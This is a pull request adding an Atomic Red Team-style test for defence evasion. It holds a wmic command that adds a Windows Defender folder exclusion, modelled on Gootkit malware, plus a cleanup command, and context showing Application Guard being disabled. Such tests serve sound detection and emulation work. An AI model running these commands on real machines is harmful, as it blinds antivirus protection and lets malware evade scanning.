### PR TITLE
Update T1562.001

### DIFF
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -746,3 +746,17 @@ atomic_tests:
       Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
     name: powershell 
     elevation_required: true
+
+- name: WMIC Tamper with Windows Defender Evade Scanning Folder
+  description: | 
+    The following Atomic will attempt to exclude a folder within Defender leveraging WMI
+    Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"ATOMICREDTEAM\"
+    cleanup_command: |
+      wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
+    name: command_prompt
+    elevation_required: true


### PR DESCRIPTION
Add Atomic to leverage WMI to exclude a folder within Defender.

**Details:**
Utilize WMI to exclude a folder from Defender based on https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/

**Testing:**
![image](https://user-images.githubusercontent.com/78918118/199049618-5bdc3a5f-5b66-44ac-b84e-82aad228d4a1.png)

**Associated Issues:**
<!-- Please link any issues that this pull request impacts or fixes. -->